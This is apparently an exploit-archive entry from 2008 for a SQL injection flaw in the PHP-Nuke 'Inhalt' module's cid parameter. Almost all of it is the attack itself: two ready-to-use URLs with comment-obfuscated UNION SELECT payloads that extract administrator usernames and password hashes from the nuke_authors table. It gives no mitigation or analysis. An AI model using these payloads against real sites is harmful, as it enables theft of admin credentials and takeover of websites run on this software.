id: 2674
date: 02/20/2008
title: PHP-Nuke Module Inhalt (cid) SQL Injection Vulnerability
author: Crackers_Child
cves: 

========================================================
PHP-Nuke Module Inhalt (cid) SQL Injection Vulnerability
========================================================


/////////////////////////////////////////


Title   : Php - Nuke Module Inhalt Sql

Author  : Crackers_Child

Exploit :


modules.php?name=Inhalt&sop=listpages&cid=-1/**/union/**/select/**/aid,2/**/from/**/nuke_authors/*where%20admin%20-2


modules.php?name=Inhalt&sop=listpages&cid=-1/**/union/**/select/**/pwd,2/**/from/**/nuke_authors/*where%20admin%20-2



#  0day.today [2023-03-23]  #